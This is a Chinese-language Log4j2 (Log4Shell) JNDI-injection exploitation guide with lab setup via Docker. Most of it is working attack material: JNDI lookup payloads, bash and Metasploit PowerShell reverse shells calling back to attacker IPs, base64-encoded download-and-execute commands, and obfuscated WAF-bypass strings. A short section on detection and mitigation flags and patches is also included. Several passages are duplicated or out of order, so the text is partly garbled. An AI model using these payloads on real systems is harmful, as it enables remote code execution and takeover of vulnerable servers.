0x00 漏洞描述
Apache Log4j 是 Apache 的一個開源項目,Apache Log4j2是一個基於Java的日志記錄工具。該工具重寫了Log4j框架,並且引入了大量豐富的特性。我們可以控制日志信息輸送的目的地為控制台、文件、GUI組件等,通過定義每一條日志信息的級別,能夠更加細致地控制日志的生成過程。該日志框架被大量用於業務系統開發,用來記錄日志信息。
Log4j-2中存在JNDI注入漏洞,當程序將用戶輸入的數據被日志記錄時,即可觸發此漏洞,成功利用此漏洞可以在目標服務器上執行任意代碼。鑒於此漏洞危害較大,建議客戶盡快采取措施防護此漏洞
Log4j-2中存在JNDI注入漏洞,當程序將用戶輸入的數據被日志記錄時,即可觸發此漏洞,成功利用此漏洞可以在目標服務器上執行任意代碼。鑒於此漏洞危害較大,建議客戶盡快采取措施防護此漏洞
0x01 影響范圍
Apache Log4j 2.x < 2.15.0-rc2
已知受影響組件
1、Apache Struts2
2、Apache Solr
3、Apache Flink
4、Apache Druid
5、ElasticSearch
6、flume
7、dubbo
8、Redis
9、logstash
10、kafka
已知受影響組件
1、Apache Struts2
2、Apache Solr
3、Apache Flink
4、Apache Druid
5、ElasticSearch
6、flume
7、dubbo
8、Redis
9、logstash
10、kafka
11.vmvare
12.Spring-Boot-strater-log4j2
0x02 環境搭建
一、linux環境搭建
linxu環境下目前 Vulfocus 已經集成 Log4j2,可通過以下鏈接啟動在線環境測試:
http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c
也可通過 docker pull vulfocus/log4j2-rce-2021-12-09:latest 拉取本地環境運行
http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c
也可通過 docker pull vulfocus/log4j2-rce-2021-12-09:latest 拉取本地環境運行
啟動dokcer環境
docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest
http://192.168.1.4:8080/
二、win 本地環境
本地環境:java版本8u181,tomcat8.5.32
源碼包:
鏈接:https://pan.baidu.com/s/1STgDdVb4QUm9r0t9wZZA-Q
提取碼:uodm
ROOT.war為Tomcat啟動包,刪除webapps目錄下的ROOT目錄,將ROOT.war放入Tomcat的webapps目錄下,啟動Tomcat即可
0x03 漏洞利用
一、linux環境下dnslog回顯
注意:
Content-Type: application/x-www-form-urlencoded
post:
payload=${jndi:ldap://ti851c.dnslog.cn}
payload=${jndi:ldap://ti851c.dnslog.cn}
dnslog回顯:
二、win環境下dnslog回顯
注意:
Content-Type: application/x-www-form-urlencoded
post:
payload=${jndi:ldap://ti851c.dnslog.cn}
payload=${jndi:ldap://ti851c.dnslog.cn}
dnslog回顯:
三、linux環境下命令回顯
注意Content-Type: application/x-www-form-urlencoded
payload=${jndi:ldap://192.168.1.14:2222/TomcatBypass/TomcatEcho}
這里用到JNDIExploit-1.2-SNAPSHOT.jar工具啟一個ldap服務
payload=${jndi:ldap://192.168.1.14:2222/TomcatBypass/TomcatEcho}
這里用到JNDIExploit-1.2-SNAPSHOT.jar工具啟一個ldap服務
java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 2222 -p 8988 -i 0.0.0.0
執行,成功回顯
四、win環境下命令回顯
1.注意Content-Type: application/x-www-form-urlencoded
這里用到JNDIExploit-1.2-SNAPSHOT.jar工具啟一個ldap服務
這里用到JNDIExploit-1.2-SNAPSHOT.jar工具啟一個ldap服務
https://download1320.mediafire.com/8nkrfr49l20g/dm0qgwujkwcy585/JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 2222 -p 8988 -i 0.0.0.0
2.這個是輸入的payload:
${jndi:ldap://10.206.14.240:2222/Basic/TomcatEcho}
,使用的話IP修改為自己的起JNDI服務的IP即可,將剛才的包放入repeater,執行命令,添加自定義的header,cmd:whoami來執行
執行命令,並發送數據包,成功回顯
五、linux環境下反彈shell
1.JDK下載與安裝(需要JDK1.8121 版本以下)
JDK下載地址:
2.攻擊機上執行linux進行nc反彈監聽命令
nc -nvlp 2333
3.生成bash反彈命令的payload
5.啟動一個ldap服務
6.發送payload(這里ldap協議不太行,換成rmi協議可以)
nc -nvlp 2333
3.生成bash反彈命令的payload
bash -i >& /dev/tcp/192.168.1.14/2333 0>&1
4.在線網站對其payload進行編碼
https://www.jackson-t.ca/runtime-exec-payloads.html
得到:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTQvMjMzMyAgMD4mMQ==}|{base64,-d}|{bash,-i}
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTQvMjMzMyAgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.1.14"
因為java版本高於1.8.0_191之后,不會默認開啟ldap,所以我們這里需要選擇用rmi的方式來進行攻擊。
注意Content-Type: application/x-www-form-urlencoded
7.成功拿到shell
payload=${jndi:rmi://192.168.1.14:1099/zxeiar}
六、win環境下反彈shell
1.kali下msf生成powershell
use exploit/multi/script/web_delivery
set payload payload/windows/x64/powershell_reverse_tcp
set lhost 10.206.14.54
set target 2
run
2.生成的POC
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABZAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAFkALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABZAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMgAwADYALgAxADQALgA1ADQAOgA4ADAAOAAwAC8ASABKAEYAaABTAHoASQBnAEsAOQAvAGkATgByAHIAagBiAFoAUwBYAGUAMQBQAEUARQBPACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAyADAANgAuADEANAAuADUANAA6ADgAMAA4ADAALwBIAEoARgBoAFMAegBJAGcASwA5ACcAKQApADsA
github下載JNDI-Injection-Exploit poc:
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
4.協議根據實際情況使用,這里使用rmi協議發送數據包。
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABZAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAFkALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABZAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMgAwADYALgAxADQALgA1ADQAOgA4ADAAOAAwAC8ASABKAEYAaABTAHoASQBnAEsAOQAvAGkATgByAHIAagBiAFoAUwBYAGUAMQBQAEUARQBPACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAyADAANgAuADEANAAuADUANAA6ADgAMAA4ADAALwBIAEoARgBoAFMAegBJAGcASwA5ACcAKQApADsA" -A "192.168.1.7"
${jndi:rmi://10.206.14.240:1099/6lwxbt}
5.在msf中成功反彈win本地的shell.
0x04 判斷方式
只需排查Java應用是否引入 log4j-api , log4j-core 兩個jar。若存在應用使用,極大可能會受到影響。
0x05 漏洞排查
1.代碼排查:
查看 pom.xml 是否引入 org.apache.logging.log4j、org.apache.logging.log4j2
2.linux下命令排查:
3.Win下命令排查:
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
2、升級 jdk11.0.1,8u191,7u201,6u211 至更高版本
緊急緩解措施
1、修改jvm 在啟動項添加參數 -Dlog4j2.formatMsgNoLookups=true
2、將系統環境變量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 設置 為 true
3、修改配置 log4j2.formatMsgNoLookups=True
sudo find / -name "*log4j-*.jar"
3.Win下命令排查:
*log4j*.jar
4.
BurpLog4j2Scan被動掃描bp插件
https://github.com/tangxiaofeng7/BurpLog4j2Scan/releases/download/v1.1/BurpLog4j2Scan-1.0-SNAPSHOT.jar
0x06 修復方式
1、升級版本至log4j-2.15.0https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
2、升級 jdk11.0.1,8u191,7u201,6u211 至更高版本
緊急緩解措施
1、修改jvm 在啟動項添加參數 -Dlog4j2.formatMsgNoLookups=true
2、將系統環境變量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 設置 為 true
3、修改配置 log4j2.formatMsgNoLookups=True
0x07 繞過技巧
1.繞過rc1
${jndi:ldap://127.0.0.1:1389/ badClassName}
2.繞過WAF
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
3.
rce對jdk版本要求比較嚴格:rmi方式jdk 6u132 7u131 8u121以前;ldap方式jdk11.0.1 8u191 7u201 6u211以前